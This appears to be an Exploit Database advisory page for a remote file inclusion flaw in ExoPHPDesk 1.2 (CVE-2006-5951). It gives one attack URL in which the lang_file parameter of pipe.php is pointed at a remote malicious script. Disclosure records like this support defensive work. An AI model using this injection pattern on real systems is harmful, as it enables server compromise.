Exploit Database - Logo

ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion

EDB-ID: 28967 Author: Firewall1954 Published: 2006-11-11
CVE: CVE-2006-5951 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/21003/info

Exophpdesk is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Exophpdesk version 1.2 is vulnerable.

http://www.example.com/Exophpdesk_PATH/pipe.php?lang_file=[Evil Script]

Related Exploits

Trying to match CVEs (1): CVE-2006-5951
Trying to match OSVDBs (1): 31960
Other Possible E-DB Search Terms: ExoPHPDesk 1.2,  ExoPHPDesk
Date D V Title Author
2008-11-09Download Exploit Code Verified ExoPHPDesk 1.2 Final - Authentication BypassCyber-Zone
2007-01-31Download Exploit Code Verified ExoPHPDesk 1.2.1 - 'faq.php' SQL Injectionajann
Menu